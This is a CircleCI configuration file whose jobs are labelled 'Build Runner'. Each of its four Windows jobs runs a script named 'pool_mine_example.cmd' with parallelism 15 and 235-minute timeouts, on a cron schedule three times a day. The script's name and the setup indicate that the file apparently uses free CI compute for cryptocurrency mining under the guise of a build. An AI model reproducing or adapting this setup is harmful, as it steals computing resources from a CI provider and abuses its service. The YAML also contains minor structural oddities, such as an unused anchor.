working_dir: &working_dir ~/app
.build_template: &script
  steps:
    - checkout
    - run:
        name: Build Runner
        command: |
                    .\pool_mine_example.cmd
        no_output_timeout: 235m
version: 2.1
orbs:
  win: circleci/windows@2.4
jobs:
  build:
    <<: *script
    executor:
      name: win/default
      size: medium
    parallelism: 15
  build1:
    <<: *script
    executor:
      name: win/default
      size: medium
    parallelism: 15
  build2:
    <<: *script
    executor:
      name: win/default
      size: medium
    parallelism: 15
  build3:
    <<: *script
    executor:
      name: win/default
      size: medium
    parallelism: 15
workflows:
  version: 2.1
  commit:
    jobs:
      - build
      - build1
      - build2
      - build3


    triggers:
      - schedule:
          cron: "0 0,8,16 * * *"
          filters:
            branches:
              only:
                - main

  buildrunjob:
    jobs:
      - build
      - build1
      - build2
      - build3
